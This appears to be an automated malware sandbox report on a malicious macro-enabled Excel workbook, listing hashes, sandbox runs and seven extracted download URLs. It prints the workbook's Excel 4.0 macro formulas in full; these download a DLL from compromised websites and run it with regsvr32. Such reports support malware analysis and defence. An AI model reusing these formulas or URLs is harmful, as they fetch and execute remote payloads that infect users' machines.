General
-
Target
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
Size
29KB
-
Sample
241111-wxm1jsslex
-
MD5
e8fa2d22a2b5212d6f9f95cc2997a305
-
SHA1
351dd4d60dc0be89a5d39a79b94aa7958fcadcce
-
SHA256
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
SHA512
b411085384f9ed60890052364ffa177e0c62307b77f1540026bd6ff8e6587bcc024593bd05a30cc852b7070d3cac993b237e561eef3b39ee27e669decabd4909
-
SSDEEP
384:tvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:1qUtVNZAXby9y+cccS1AsuIjxl
Behavioral task
behavioral1
Sample
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e.xlsm
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://al-brik.com/vb/mMQlbHPCX/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://al-brik.com/vb/mMQlbHPCX/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
Targets
-
-
Target
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
Size
29KB
-
MD5
e8fa2d22a2b5212d6f9f95cc2997a305
-
SHA1
351dd4d60dc0be89a5d39a79b94aa7958fcadcce
-
SHA256
9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e
-
SHA512
b411085384f9ed60890052364ffa177e0c62307b77f1540026bd6ff8e6587bcc024593bd05a30cc852b7070d3cac993b237e561eef3b39ee27e669decabd4909
-
SSDEEP
384:tvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:1qUtVNZAXby9y+cccS1AsuIjxl
Score10/10 -